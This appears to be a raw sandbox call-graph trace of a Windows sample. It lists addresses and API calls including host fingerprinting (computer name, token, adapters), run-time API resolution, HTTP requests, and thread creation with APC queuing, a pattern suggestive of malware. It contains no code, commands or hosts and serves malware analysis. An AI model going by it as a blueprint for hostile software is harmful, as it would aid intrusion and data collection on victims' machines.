RtlFreeHeap 19837->19838 19838->19835 19839 29f3b8e812a 19840 29f3b905560 RtlFreeHeap 19839->19840 19845 29f3b8e813e 19840->19845 19841->19839 19842 29f3b90b4e0 RtlFreeHeap 19841->19842 19842->19839 19843 29f3b8e8160 19844 29f3b905560 RtlFreeHeap 19843->19844 19849 29f3b8e8174 19844->19849 19845->19843 19846 29f3b90b4e0 RtlFreeHeap 19845->19846 19846->19843 19847 29f3b8e8197 19848 29f3b905560 RtlFreeHeap 19847->19848 19853 29f3b8e81ab 19848->19853 19849->19847 19851 29f3b90b4e0 RtlFreeHeap 19849->19851 19850 29f3b8e81d4 19852 29f3b905560 RtlFreeHeap 19850->19852 19851->19847 19854 29f3b8e81e8 19852->19854 19853->19850 19855 29f3b90b4e0 RtlFreeHeap 19853->19855 19856 29f3b8e823d 19854->19856 19858 29f3b8fbe20 RtlFreeHeap 19854->19858 19855->19850 19857 29f3b905560 RtlFreeHeap 19856->19857 19878 29f3b8e8251 19857->19878 19859 29f3b8e8214 19858->19859 19863 29f3b90b4e0 RtlFreeHeap 19859->19863 19860 29f3b8e838a 19861 29f3b905560 RtlFreeHeap 19860->19861 19862 29f3b8e839e 19861->19862 19865 29f3b905560 RtlFreeHeap 19862->19865 19864 29f3b8e8235 19863->19864 19866 29f3b90b4e0 RtlFreeHeap 19864->19866 19870 29f3b8e83ba 19865->19870 19866->19856 19867 29f3b8e8b86 19867->19634 19868 29f3b8e8430 19869 29f3b905560 RtlFreeHeap 19868->19869 19871 29f3b8e8444 19869->19871 19870->19867 19870->19868 19883 29f3b90b4e0 RtlFreeHeap 19870->19883 19872 29f3b8e846d 19871->19872 19876 29f3b8fbe20 RtlFreeHeap 19871->19876 19881 29f3b905560 RtlFreeHeap 19872->19881 19873 29f3b8e8322 19874 29f3b8e835d 19873->19874 19886 29f3b8ea050 RtlFreeHeap 19873->19886 19875 29f3b90b4e0 RtlFreeHeap 19874->19875 19879 29f3b8e837d 19875->19879 19880 29f3b8e8460 19876->19880 19878->19860 19878->19873 20178 29f3b8ea050 19878->20178 19884 29f3b90b4e0 RtlFreeHeap 19879->19884 19885 29f3b90b4e0 RtlFreeHeap 19880->19885 19882 29f3b8e848e 19881->19882 19887 29f3b8e84b7 19882->19887 19889 29f3b8fbe20 RtlFreeHeap 19882->19889 19888 29f3b8e8423 19883->19888 19884->19860 19885->19872 19886->19874 19892 29f3b905560 RtlFreeHeap 19887->19892 19890 29f3b90b4e0 RtlFreeHeap 19888->19890 19891 29f3b8e84aa 19889->19891 19890->19868 19893 29f3b90b4e0 RtlFreeHeap 19891->19893 19894 29f3b8e84d8 19892->19894 19893->19887 19895 29f3b8e8501 19894->19895 19896 29f3b8fbe20 RtlFreeHeap 19894->19896 19897 29f3b905560 RtlFreeHeap 19895->19897 19898 29f3b8e84f4 19896->19898 19899 29f3b8e8522 19897->19899 19900 29f3b90b4e0 RtlFreeHeap 19898->19900 19901 29f3b8e854b 19899->19901 19902 29f3b8fbe20 RtlFreeHeap 19899->19902 19900->19895 19904 29f3b905560 RtlFreeHeap 19901->19904 19903 29f3b8e853e 19902->19903 19905 29f3b90b4e0 RtlFreeHeap 19903->19905 19906 29f3b8e856c 19904->19906 19905->19901 19907 29f3b8e8595 19906->19907 19908 29f3b8fbe20 RtlFreeHeap 19906->19908 19909 29f3b905560 RtlFreeHeap 19907->19909 19910 29f3b8e8588 19908->19910 19911 29f3b8e85b6 19909->19911 19912 29f3b90b4e0 RtlFreeHeap 19910->19912 19913 29f3b905560 RtlFreeHeap 19911->19913 19912->19907 19914 29f3b8e85d2 19913->19914 19914->19867 19915 29f3b90b4e0 RtlFreeHeap 19914->19915 19916 29f3b8e8625 19915->19916 19917 29f3b90b4e0 RtlFreeHeap 19916->19917 19918 29f3b8e865e 19917->19918 19919 29f3b905560 RtlFreeHeap 19918->19919 19920 29f3b8e8672 19919->19920 19920->19867 19921 29f3b90b4e0 RtlFreeHeap 19920->19921 19922 29f3b8e8797 19921->19922 19923 29f3b90b4e0 RtlFreeHeap 19922->19923 19924 29f3b8e87a4 19923->19924 19925 29f3b905560 RtlFreeHeap 19924->19925 19926 29f3b8e87b8 19925->19926 19926->19867 19927 29f3b90b4e0 RtlFreeHeap 19926->19927 19928 29f3b8e87ec 19927->19928 19929 29f3b905560 RtlFreeHeap 19928->19929 19930 29f3b8e8800 19929->19930 19930->19867 19931 29f3b90b4e0 RtlFreeHeap 19930->19931 19932 29f3b8e882d 19931->19932 19933 29f3b905560 RtlFreeHeap 19932->19933 19934 29f3b8e8841 19933->19934 19935 29f3b905560 RtlFreeHeap 19934->19935 19936 29f3b8e885d 19935->19936 19936->19867 19937 29f3b90b4e0 RtlFreeHeap 19936->19937 19938 29f3b8e8897 19937->19938 19939 29f3b905560 RtlFreeHeap 19938->19939 19940 29f3b8e88ab 19939->19940 19940->19867 19941 29f3b90b4e0 RtlFreeHeap 19940->19941 19942 29f3b8e89c8 19941->19942 19943 29f3b90b4e0 RtlFreeHeap 19942->19943 19944 29f3b8e89d5 19943->19944 19945 29f3b905560 RtlFreeHeap 19944->19945 19954 29f3b8e89eb 19945->19954 19946 29f3b8e8aec 19950 29f3b8fbe20 RtlFreeHeap 19946->19950 19956 29f3b8e8b47 19946->19956 19947 29f3b90b4e0 RtlFreeHeap 19949 29f3b8e8b79 19947->19949 19948 29f3b8fbe20 RtlFreeHeap 19948->19954 19951 29f3b90b4e0 RtlFreeHeap 19949->19951 19952 29f3b8e8b2a 19950->19952 19951->19867 19955 29f3b90b4e0 RtlFreeHeap 19952->19955 19953 29f3b90b4e0 RtlFreeHeap 19953->19954 19954->19867 19954->19946 19954->19948 19954->19953 19955->19956 19956->19947 19958 29f3b904db1 19957->19958 19959 29f3b904dc7 GetComputerNameExW 19957->19959 19958->19959 19960 29f3b904def 19959->19960 19961 29f3b904df3 GetTokenInformation 19960->19961 19966 29f3b904e4e 19960->19966 19962 29f3b904e1c 19961->19962 19961->19966 19963 29f3b904e3e 19962->19963 19964 29f3b913de0 RtlFreeHeap 19962->19964 19965 29f3b913de0 RtlFreeHeap 19963->19965 19964->19963 19965->19966 19967 29f3b8fdfc0 RtlFreeHeap 19966->19967 19968 29f3b904e90 19967->19968 19969 29f3b904eaa GetNativeSystemInfo 19968->19969 19970 29f3b913de0 RtlFreeHeap 19968->19970 19971 29f3b904ed3 19969->19971 19972 29f3b904ee8 19969->19972 19970->19969 19974 29f3b913de0 RtlFreeHeap 19971->19974 19972->19971 19973 29f3b904f17 19972->19973 19975 29f3b913de0 RtlFreeHeap 19973->19975 19976 29f3b904f15 19974->19976 19975->19976 19978 29f3b913de0 RtlFreeHeap 19976->19978 19981 29f3b904f67 19976->19981 19977 29f3b904f8f GetAdaptersInfo 19979 29f3b904fbb 19977->19979 19980 29f3b904fdd 19977->19980 19978->19981 19982 29f3b90b4e0 RtlFreeHeap 19979->19982 19980->19979 19984 29f3b904fea GetAdaptersInfo 19980->19984 19981->19977 19983 29f3b904fc5 19982->19983 19985 29f3b90b4e0 RtlFreeHeap 19983->19985 19984->19979 19988 29f3b904fff 19984->19988 19986 29f3b904fcd 19985->19986 19986->19637 19987 29f3b913de0 RtlFreeHeap 19987->19988 19988->19979 19988->19987 19991 29f3b914759 19989->19991 19990 29f3b9147af 19990->19643 19991->19990 19992 29f3b9147ad NtFreeVirtualMemory 19991->19992 19992->19990 20182 29f3b8f3270 19993->20182 19996 29f3b913de0 RtlFreeHeap 19997 29f3b8f3ebe 19996->19997 19998 29f3b913de0 RtlFreeHeap 19997->19998 19999 29f3b8f3ee0 19998->19999 20000 29f3b913de0 RtlFreeHeap 19999->20000 20001 29f3b8f3f02 20000->20001 20002 29f3b90b4e0 RtlFreeHeap 20001->20002 20003 29f3b8f3f1d 20002->20003 20004 29f3b90b4e0 RtlFreeHeap 20003->20004 20005 29f3b8f3f61 20004->20005 20006 29f3b8f3fd7 20005->20006 20008 29f3b8f3fd9 20005->20008 20009 29f3b8f3fc0 20005->20009 20007 29f3b8ea050 RtlFreeHeap 20006->20007 20010 29f3b8f4005 20006->20010 20007->20010 20011 29f3b8ea050 RtlFreeHeap 20008->20011 20009->20006 20013 29f3b8ea050 RtlFreeHeap 20009->20013 20012 29f3b90b4e0 RtlFreeHeap 20010->20012 20011->20006 20014 29f3b8f400d 20012->20014 20013->20006 20015 29f3b90b4e0 RtlFreeHeap 20014->20015 20016 29f3b8f4015 20015->20016 20017 29f3b8f4067 20016->20017 20018 29f3b8f4060 20016->20018 20282 29f3b8e7830 20017->20282 20206 29f3b8f6fa0 20018->20206 20021 29f3b8f4065 20022 29f3b90b4e0 RtlFreeHeap 20021->20022 20023 29f3b8f407f 20022->20023 20024 29f3b8f40bb 20023->20024 20025 29f3b8fbe20 RtlFreeHeap 20023->20025 20026 29f3b90b4e0 RtlFreeHeap 20024->20026 20027 29f3b8f40ac 20025->20027 20028 29f3b8f411c 20026->20028 20029 29f3b8f40b3 20027->20029 20037 29f3b8f40bd 20027->20037 20030 29f3b90b4e0 RtlFreeHeap 20028->20030 20031 29f3b90b4e0 RtlFreeHeap 20029->20031 20032 29f3b8f4124 20030->20032 20031->20024 20033 29f3b90b4e0 RtlFreeHeap 20032->20033 20034 29f3b8f412c 20033->20034 20035 29f3b90b4e0 RtlFreeHeap 20034->20035 20036 29f3b8f4139 20035->20036 20036->19643 20038 29f3b90b4e0 RtlFreeHeap 20037->20038 20038->20024 20040 29f3b8e8bde 20039->20040 20041 29f3b8ea050 RtlFreeHeap 20040->20041 20042 29f3b8e8c5e 20041->20042 20043 29f3b8ea050 RtlFreeHeap 20042->20043 20044 29f3b8e8c97 20043->20044 20045 29f3b90b4e0 RtlFreeHeap 20044->20045 20046 29f3b8e8cee 20045->20046 20047 29f3b8e8d5c 20046->20047 20049 29f3b8e8d5e 20046->20049 20050 29f3b8e8d44 20046->20050 20048 29f3b8ea050 RtlFreeHeap 20047->20048 20052 29f3b8e8d8b 20047->20052 20048->20052 20051 29f3b8ea050 RtlFreeHeap 20049->20051 20050->20047 20054 29f3b8ea050 RtlFreeHeap 20050->20054 20051->20047 20053 29f3b90b4e0 RtlFreeHeap 20052->20053 20055 29f3b8e8d93 20053->20055 20054->20047 20056 29f3b90b4e0 RtlFreeHeap 20055->20056 20057 29f3b8e8d9b 20056->20057 20058 29f3b8e8de9 20057->20058 20059 29f3b8e8df0 20057->20059 20061 29f3b8f6fa0 2 API calls 20058->20061 20060 29f3b8e7830 7 API calls 20059->20060 20062 29f3b8e8dee 20060->20062 20061->20062 20063 29f3b8e8e8e 20062->20063 20064 29f3b8fbe20 RtlFreeHeap 20062->20064 20328 29f3b8e17b0 20063->20328 20066 29f3b8e8e23 20064->20066 20068 29f3b8e8e2a 20066->20068 20073 29f3b8e8e34 20066->20073 20067 29f3b8e8e32 20069 29f3b90b4e0 RtlFreeHeap 20067->20069 20070 29f3b90b4e0 RtlFreeHeap 20068->20070 20071 29f3b8e8ea4 20069->20071 20070->20067 20072 29f3b90b4e0 RtlFreeHeap 20071->20072 20074 29f3b8e8eac 20072->20074 20077 29f3b90b4e0 RtlFreeHeap 20073->20077 20075 29f3b90b4e0 RtlFreeHeap 20074->20075 20076 29f3b8e8eb4 20075->20076 20079 29f3b90b4e0 RtlFreeHeap 20076->20079 20078 29f3b8e8e5f 20077->20078 20080 29f3b8ea050 RtlFreeHeap 20078->20080 20081 29f3b8e8ebc 20079->20081 20082 29f3b8e8e71 20080->20082 20081->19643 20083 29f3b90b4e0 RtlFreeHeap 20082->20083 20084 29f3b8e8e79 20083->20084 20339 29f3b9051d0 20084->20339 20087 29f3b90b4e0 RtlFreeHeap 20087->20063 20089 29f3b8efff9 20088->20089 20090 29f3b8e2939 20089->20090 20091 29f3b8ecce0 LdrGetProcedureAddress 20089->20091 20108 29f3b8ef8a0 20090->20108 20092 29f3b8f0072 20091->20092 20093 29f3b8ecce0 LdrGetProcedureAddress 20092->20093 20094 29f3b8f008d 20093->20094 20095 29f3b8ecce0 LdrGetProcedureAddress 20094->20095 20096 29f3b8f00b6 20095->20096 20097 29f3b8ecce0 LdrGetProcedureAddress 20096->20097 20098 29f3b8f00d5 20097->20098 20099 29f3b8ecce0 LdrGetProcedureAddress 20098->20099 20100 29f3b8f00f4 20099->20100 20101 29f3b8ecce0 LdrGetProcedureAddress 20100->20101 20102 29f3b8f0113 20101->20102 20103 29f3b8ecce0 LdrGetProcedureAddress 20102->20103 20104 29f3b8f0132 20103->20104 20105 29f3b8ecce0 LdrGetProcedureAddress 20104->20105 20106 29f3b8f0151 20105->20106 20107 29f3b8ecce0 LdrGetProcedureAddress 20106->20107 20107->20090 20109 29f3b8ef8da 20108->20109 20110 29f3b8e293e 20109->20110 20111 29f3b8ecce0 LdrGetProcedureAddress 20109->20111 20116 29f3b8f3470 20110->20116 20112 29f3b8ef900 20111->20112 20113 29f3b8ecce0 LdrGetProcedureAddress 20112->20113 20114 29f3b8ef91b 20113->20114 20115 29f3b8ecce0 LdrGetProcedureAddress 20114->20115 20115->20110 20118 29f3b8f3489 20116->20118 20117 29f3b8f3493 20117->19650 20118->20117 20119 29f3b8ecce0 LdrGetProcedureAddress 20118->20119 20120 29f3b8f3502 20119->20120 20121 29f3b8ecce0 LdrGetProcedureAddress 20120->20121 20122 29f3b8f351d 20121->20122 20123 29f3b8ecce0 LdrGetProcedureAddress 20122->20123 20124 29f3b8f3546 20123->20124 20125 29f3b8ecce0 LdrGetProcedureAddress 20124->20125 20126 29f3b8f3565 20125->20126 20127 29f3b8ecce0 LdrGetProcedureAddress 20126->20127 20128 29f3b8f3584 20127->20128 20129 29f3b8ecce0 LdrGetProcedureAddress 20128->20129 20130 29f3b8f35a3 20129->20130 20131 29f3b8ecce0 LdrGetProcedureAddress 20130->20131 20132 29f3b8f35c2 20131->20132 20133 29f3b8ecce0 LdrGetProcedureAddress 20132->20133 20134 29f3b8f35e1 20133->20134 20135 29f3b8ecce0 LdrGetProcedureAddress 20134->20135 20136 29f3b8f3600 20135->20136 20137 29f3b8ecce0 LdrGetProcedureAddress 20136->20137 20138 29f3b8f361f 20137->20138 20139 29f3b8ecce0 LdrGetProcedureAddress 20138->20139 20140 29f3b8f363e 20139->20140 20141 29f3b8ecce0 LdrGetProcedureAddress 20140->20141 20142 29f3b8f365d 20141->20142 20143 29f3b8ecce0 LdrGetProcedureAddress 20142->20143 20144 29f3b8f367c 20143->20144 20145 29f3b8ecce0 LdrGetProcedureAddress 20144->20145 20146 29f3b8f369b 20145->20146 20147 29f3b8ecce0 LdrGetProcedureAddress 20146->20147 20148 29f3b8f36ba 20147->20148 20149 29f3b8ecce0 LdrGetProcedureAddress 20148->20149 20150 29f3b8f36d9 20149->20150 20151 29f3b8ecce0 LdrGetProcedureAddress 20150->20151 20152 29f3b8f36f8 20151->20152 20153 29f3b8ecce0 LdrGetProcedureAddress 20152->20153 20154 29f3b8f3717 20153->20154 20155 29f3b8ecce0 LdrGetProcedureAddress 20154->20155 20156 29f3b8f3736 20155->20156 20157 29f3b8ecce0 LdrGetProcedureAddress 20156->20157 20158 29f3b8f3755 20157->20158 20159 29f3b8ecce0 LdrGetProcedureAddress 20158->20159 20159->20117 20162 29f3b8ecd1b 20160->20162 20161 29f3b8ecdbf 20161->19654 20162->20161 20163 29f3b8ecd9b LdrGetProcedureAddress 20162->20163 20163->20161 20165 29f3b8e8eee CreateMutexExA 20164->20165 20166 29f3b913de0 20165->20166 20168 29f3b913e14 20166->20168 20167 29f3b8e8f71 20167->19788 20168->20167 20169 29f3b90b4e0 RtlFreeHeap 20168->20169 20169->20168 20171 29f3b8e8016 20170->20171 20172 29f3b90557b 20170->20172 20171->19826 20174 29f3b8fbe20 20171->20174 20172->20171 20173 29f3b90b4e0 RtlFreeHeap 20172->20173 20173->20171 20176 29f3b8fbe5c 20174->20176 20175 29f3b8fbea5 20175->19826 20176->20175 20177 29f3b90b4e0 RtlFreeHeap 20176->20177 20177->20175 20180 29f3b8ea084 20178->20180 20179 29f3b8ea118 20179->19878 20180->20179 20181 29f3b90b4e0 RtlFreeHeap 20180->20181 20181->20180 20184 29f3b8f3287 20182->20184 20183 29f3b8f3291 20183->19996 20184->20183 20185 29f3b8ecce0 LdrGetProcedureAddress 20184->20185 20186 29f3b8f3306 20185->20186 20187 29f3b8ecce0 LdrGetProcedureAddress 20186->20187 20188 29f3b8f3321 20187->20188 20189 29f3b8ecce0 LdrGetProcedureAddress 20188->20189 20190 29f3b8f334a 20189->20190 20191 29f3b8ecce0 LdrGetProcedureAddress 20190->20191 20192 29f3b8f3369 20191->20192 20193 29f3b8ecce0 LdrGetProcedureAddress 20192->20193 20194 29f3b8f3388 20193->20194 20195 29f3b8ecce0 LdrGetProcedureAddress 20194->20195 20196 29f3b8f33a7 20195->20196 20197 29f3b8ecce0 LdrGetProcedureAddress 20196->20197 20198 29f3b8f33c6 20197->20198 20199 29f3b8ecce0 LdrGetProcedureAddress 20198->20199 20200 29f3b8f33e5 20199->20200 20201 29f3b8ecce0 LdrGetProcedureAddress 20200->20201 20202 29f3b8f3404 20201->20202 20203 29f3b8ecce0 LdrGetProcedureAddress 20202->20203 20204 29f3b8f3423 20203->20204 20205 29f3b8ecce0 LdrGetProcedureAddress 20204->20205 20205->20183 20207 29f3b8f7037 20206->20207 20208 29f3b8f7319 20207->20208 20209 29f3b8f70a9 20207->20209 20210 29f3b90b4e0 RtlFreeHeap 20208->20210 20305 29f3b8e93f0 20209->20305 20212 29f3b8f732d 20210->20212 20214 29f3b8e93f0 RtlFreeHeap 20212->20214 20216 29f3b8f7339 20214->20216 20215 29f3b8ea050 RtlFreeHeap 20217 29f3b8f70ce 20215->20217 20218 29f3b8ea050 RtlFreeHeap 20216->20218 20219 29f3b8e93f0 RtlFreeHeap 20217->20219 20220 29f3b8f734d 20218->20220 20221 29f3b8f70d9 20219->20221 20222 29f3b8e93f0 RtlFreeHeap 20220->20222 20223 29f3b8ea050 RtlFreeHeap 20221->20223 20225 29f3b8f7358 20222->20225 20224 29f3b8f7106 20223->20224 20311 29f3b8e7370 20224->20311 20227 29f3b8ea050 RtlFreeHeap 20225->20227 20228 29f3b8f7385 20227->20228 20229 29f3b8e7370 2 API calls 20228->20229 20231 29f3b8f73b9 20229->20231 20230 29f3b8f7740 20232 29f3b90b4e0 RtlFreeHeap 20230->20232 20231->20230 20234 29f3b90b4e0 RtlFreeHeap 20231->20234 20233 29f3b8f775a 20232->20233 20233->20021 20235 29f3b8f73cc 20234->20235 20237 29f3b8e93f0 RtlFreeHeap 20235->20237 20236 29f3b90b4e0 RtlFreeHeap 20255 29f3b8f713a 20236->20255 20239 29f3b8f73db 20237->20239 20238 29f3b8f7257 20241 29f3b90b4e0 RtlFreeHeap 20238->20241 20259 29f3b8f7452 20238->20259 20243 29f3b8ea050 RtlFreeHeap 20239->20243 20240 29f3b8e93f0 RtlFreeHeap 20240->20255 20244 29f3b8f7282 20241->20244 20242 29f3b90b4e0 RtlFreeHeap 20242->20259 20252 29f3b8f7409 20243->20252 20246 29f3b8e93f0 RtlFreeHeap 20244->20246 20245 29f3b8ea050 RtlFreeHeap 20245->20255 20249 29f3b8f7292 20246->20249 20247 29f3b8e93f0 RtlFreeHeap 20247->20259 20248 29f3b8e7370 2 API calls 20248->20252 20250 29f3b8ea050 RtlFreeHeap 20249->20250 20257 29f3b8f72d1 20250->20257 20251 29f3b8ea050 RtlFreeHeap 20251->20259 20252->20248 20252->20259 20253 29f3b8e7370 2 API calls 20253->20255 20254 29f3b8e7370 2 API calls 20254->20257 20255->20230 20255->20236 20255->20238 20255->20240 20255->20245 20255->20253 20256 29f3b8e7370 2 API calls 20256->20259 20257->20254 20257->20259 20258 29f3b8f74f8 20260 29f3b8f750e 20258->20260 20261 29f3b90b4e0 RtlFreeHeap 20258->20261 20259->20242 20259->20247 20259->20251 20259->20256 20259->20258 20260->20230 20262 29f3b90b4e0 RtlFreeHeap 20260->20262 20261->20260 20263 29f3b8f7529 20262->20263 20264 29f3b8ea050 RtlFreeHeap 20263->20264 20267 29f3b8f754c 20264->20267 20265 29f3b8e7370 2 API calls 20265->20267 20266 29f3b90b4e0 RtlFreeHeap 20266->20267 20267->20265 20267->20266 20271 29f3b8f75b1 20267->20271 20268 29f3b90b4e0 RtlFreeHeap 20268->20271 20269 29f3b8e93f0 RtlFreeHeap 20269->20271 20270 29f3b8e7370 2 API calls 20270->20271 20271->20230 20271->20268 20271->20269 20271->20270 20272 29f3b8f769e 20271->20272 20273 29f3b8ea050 RtlFreeHeap 20271->20273 20274 29f3b90b4e0 RtlFreeHeap 20272->20274 20273->20271 20275 29f3b8f76a6 20274->20275 20276 29f3b8e93f0 RtlFreeHeap 20275->20276 20277 29f3b8f76b2 20276->20277 20278 29f3b8ea050 RtlFreeHeap 20277->20278 20281 29f3b8f76e5 20278->20281 20279 29f3b8e7370 2 API calls 20279->20281 20280 29f3b90b4e0 RtlFreeHeap 20280->20281 20281->20230 20281->20279 20281->20280 20283 29f3b8e788a InternetOpenW 20282->20283 20284 29f3b8e7885 20282->20284 20285 29f3b8e7aed 20283->20285 20286 29f3b8e7898 InternetConnectW 20283->20286 20284->20283 20288 29f3b8e7b0e InternetCloseHandle 20285->20288 20290 29f3b8e7b17 20285->20290 20286->20285 20287 29f3b8e78dd HttpOpenRequestW 20286->20287 20287->20285 20289 29f3b8e7931 20287->20289 20288->20290 20289->20285 20292 29f3b8e79cb HttpSendRequestA 20289->20292 20291 29f3b8e7b56 20290->20291 20294 29f3b8e7b8c 20290->20294 20300 29f3b8e7b60 20290->20300 20293 29f3b90b4e0 RtlFreeHeap 20291->20293 20291->20300 20292->20285 20297 29f3b8e79e4 20292->20297 20293->20300 20295 29f3b8ea050 RtlFreeHeap 20294->20295 20296 29f3b8e7ba4 20295->20296 20298 29f3b90b4e0 RtlFreeHeap 20296->20298 20299 29f3b90b4e0 RtlFreeHeap 20297->20299 20304 29f3b8e7a24 20297->20304 20298->20300 20299->20304 20300->20021 20301 29f3b8e7a3f InternetQueryDataAvailable 20302 29f3b8e7ae3 20301->20302 20301->20304 20303 29f3b90b4e0 RtlFreeHeap 20302->20303 20303->20285 20304->20301 20304->20302 20307 29f3b8e9400 20305->20307 20306 29f3b8e9483 20308 29f3b90b4e0 RtlFreeHeap 20306->20308 20307->20306 20310 29f3b90b4e0 RtlFreeHeap 20307->20310 20309 29f3b8e94f0 20308->20309 20309->20215 20310->20306 20318 29f3b8efb20 20311->20318 20313 29f3b90b4e0 RtlFreeHeap 20314 29f3b8e780a 20313->20314 20314->20255 20315 29f3b8e7422 20315->20313 20316 29f3b8e73a4 20316->20315 20317 29f3b8ea050 RtlFreeHeap 20316->20317 20317->20316 20319 29f3b8efb39 20318->20319 20320 29f3b8efb43 20319->20320 20321 29f3b8ecce0 LdrGetProcedureAddress 20319->20321 20320->20316 20322 29f3b8efbae 20321->20322 20323 29f3b8ecce0 LdrGetProcedureAddress 20322->20323 20324 29f3b8efbc9 20323->20324 20325 29f3b8ecce0 LdrGetProcedureAddress 20324->20325 20326 29f3b8efbf0 20325->20326 20327 29f3b8ecce0 LdrGetProcedureAddress 20326->20327 20327->20320 20337 29f3b8e17f5 20328->20337 20329 29f3b8e180f 20330 29f3b90b4e0 RtlFreeHeap 20329->20330 20331 29f3b8e1820 20330->20331 20332 29f3b90b4e0 RtlFreeHeap 20331->20332 20333 29f3b8e1838 20332->20333 20334 29f3b8ea050 RtlFreeHeap 20333->20334 20335 29f3b8e1b61 20333->20335 20336 29f3b90b4e0 RtlFreeHeap 20333->20336 20334->20333 20335->20067 20336->20333 20337->20329 20343 29f3b8e4cd0 20337->20343 20342 29f3b9051e5 20339->20342 20340 29f3b8e8e86 20340->20087 20341 29f3b90b4e0 RtlFreeHeap 20341->20340 20342->20340 20342->20341 20344 29f3b914360 NtCreateThreadEx 20343->20344 20345 29f3b8e4d3d 20344->20345 20346 29f3b914ff0 NtQueueApcThread 20345->20346 20347 29f3b8e4d58 20346->20347 20347->20337 19456 29f3b8e1600 19458 29f3b8e162c 19456->19458 19457 29f3b8e1792 RtlExitUserThread 19458->19457 19465 29f3b913ba0 19458->19465 19460 29f3b8e1717 19471 29f3b8f9830 19460->19471 19462 29f3b8e1735 19463 29f3b90b4e0 RtlFreeHeap 19462->19463 19464 29f3b8e173d 19463->19464 19464->19457 19466 29f3b913bc7 19465->19466 19467 29f3b913bd8 19465->19467 19475 29f3b913cd0 19466->19475 19469 29f3b913c87 19467->19469 19470 29f3b913cd0 RtlFreeHeap 19467->19470 19469->19460 19470->19469 19473 29f3b8f984d 19471->19473 19472 29f3b8f9886 19473->19472 19481 29f3b8fdfc0 19473->19481 19476 29f3b913d18 19475->19476 19477 29f3b913d56 19476->19477 19480 29f3b90b4e0 RtlFreeHeap 19476->19480 19478 29f3b90b4e0 RtlFreeHeap 19477->19478 19479 29f3b913dcc 19478->19479 19479->19467 19480->19477 19482 29f3b8fdff1 19481->19482 19483 29f3b8fe03d 19482->19483 19484 29f3b90b4e0 RtlFreeHeap 19482->19484 19483->19472 19484->19483 19625 273f414d0 19626 273f414e0 SleepEx 19625->19626 19626->19626 19489 29f3b913f40 19491 29f3b913f69 19489->19491 19490 29f3b913fc9 19491->19490 19492 29f3b913fc7 NtAllocateVirtualMemory 19491->19492 19492->19490 20348 29f3b8e71b0 20349 29f3b8e71c6 20348->20349 20356 29f3b8e2950 20349->20356 20351 29f3b8e71f5 20352 29f3b914360 NtCreateThreadEx 20351->20352 20353 29f3b8e730e 20352->20353 20354 29f3b914ff0 NtQueueApcThread 20353->20354 20355 29f3b8e732d 20354->20355 20373 29f3b8f16a0 20356->20373 20358 29f3b8e2959 20545 29f3b8f01a0 20358->20545 20360 29f3b8e2963 20361 29f3b8f0f99 20360->20361 20362 29f3b8ecce0 LdrGetProcedureAddress 20360->20362 20361->20351 20363 29f3b8f0ef8 20362->20363 20364 29f3b8ecce0 LdrGetProcedureAddress 20363->20364 20365 29f3b8f0f13 20364->20365 20366 29f3b8ecce0 LdrGetProcedureAddress 20365->20366 20367 29f3b8f0f3c 20366->20367 20368 29f3b8ecce0 LdrGetProcedureAddress 20367->20368 20369 29f3b8f0f5b 20368->20369 20370 29f3b8ecce0 LdrGetProcedureAddress 20369->20370 20371 29f3b8f0f7a 20370->20371 20372 29f3b8ecce0 LdrGetProcedureAddress 20371->20372 20372->20361 20374 29f3b8f16a9 20373->20374 20375 29f3b8f21e1 20374->20375 20376 29f3b8ecce0 LdrGetProcedureAddress 20374->20376 20375->20358 20377 29f3b8f16c8 20376->20377 20378 29f3b8ecce0 LdrGetProcedureAddress 20377->20378 20379 29f3b8f16e0 20378->20379 20380 29f3b8ecce0 LdrGetProcedureAddress 20379->20380 20381 29f3b8f16f8 20380->20381 20382 29f3b8ecce0 LdrGetProcedureAddress 20381->20382 20383 29f3b8f1710 20382->20383 20384 29f3b8ecce0 LdrGetProcedureAddress 20383->20384 20385 29f3b8f1728 20384->20385 20386 29f3b8ecce0 LdrGetProcedureAddress 20385->20386 20387 29f3b8f1740 20386->20387 20388 29f3b8ecce0 LdrGetProcedureAddress 20387->20388 20389 29f3b8f1758 20388->20389 20390 29f3b8ecce0 LdrGetProcedureAddress 20389->20390 20391 29f3b8f1770 20390->20391 20392 29f3b8ecce0 LdrGetProcedureAddress 20391->20392 20393 29f3b8f1788 20392->20393 20394 29f3b8ecce0 LdrGetProcedureAddress 20393->20394 20395 29f3b8f17a0 20394->20395 20396 29f3b8ecce0 LdrGetProcedureAddress 20395->20396 20397 29f3b8f17b8 20396->20397 20398 29f3b8ecce0 LdrGetProcedureAddress 20397->20398 20399 29f3b8f17d0 20398->20399 20400 29f3b8ecce0 LdrGetProcedureAddress 20399->20400 20401 29f3b8f17e8 20400->20401 20402 29f3b8ecce0 LdrGetProcedureAddress 20401->20402 20403 29f3b8f1800 20402->20403 20404 29f3b8ecce0 LdrGetProcedureAddress 20403->20404 20405 29f3b8f1818 20404->20405 20406 29f3b8ecce0 LdrGetProcedureAddress 20405->20406 20407 29f3b8f1830 20406->20407 20408 29f3b8ecce0 LdrGetProcedureAddress 20407->20408 20409 29f3b8f1848 20408->20409 20410 29f3b8ecce0 LdrGetProcedureAddress 20409->20410 20411 29f3b8f1860 20410->20411 20412 29f3b8ecce0 LdrGetProcedureAddress 20411->20412 20413 29f3b8f1878 20412->20413 20414 29f3b8ecce0 LdrGetProcedureAddress 20413->20414 20415 29f3b8f1890 20414->20415 20416 29f3b8ecce0 LdrGetProcedureAddress 20415->20416 20417 29f3b8f18a8 20416->20417 20418 29f3b8ecce0 LdrGetProcedureAddress 20417->20418 20419 29f3b8f18c0 20418->20419 20420 29f3b8ecce0 LdrGetProcedureAddress 20419->20420 20421 29f3b8f18d8 20420->20421 20422 29f3b8ecce0 LdrGetProcedureAddress 20421->20422 20423 29f3b8f18f0 20422->20423 20424 29f3b8ecce0 LdrGetProcedureAddress 20423->20424 20425 29f3b8f1908 20424->20425 20426 29f3b8ecce0 LdrGetProcedureAddress 20425->20426 20427 29f3b8f1920 20426->20427 20428 29f3b8ecce0 LdrGetProcedureAddress 20427->20428 20429 29f3b8f1938 20428->20429 20430 29f3b8ecce0 LdrGetProcedureAddress 20429->20430 20431 29f3b8f1950 20430->20431 20432 29f3b8ecce0 LdrGetProcedureAddress 20431->20432 20433 29f3b8f1968 20432->20433 20434 29f3b8ecce0 LdrGetProcedureAddress 20433->20434 20435 29f3b8f1980 20434->20435 20436 29f3b8ecce0 LdrGetProcedureAddress 20435->20436 20437 29f3b8f1998 20436->20437 20438 29f3b8ecce0 LdrGetProcedureAddress 20437->20438 20439 29f3b8f19b0 20438->20439 20440 29f3b8ecce0 LdrGetProcedureAddress 20439->20440 20441 29f3b8f19c8 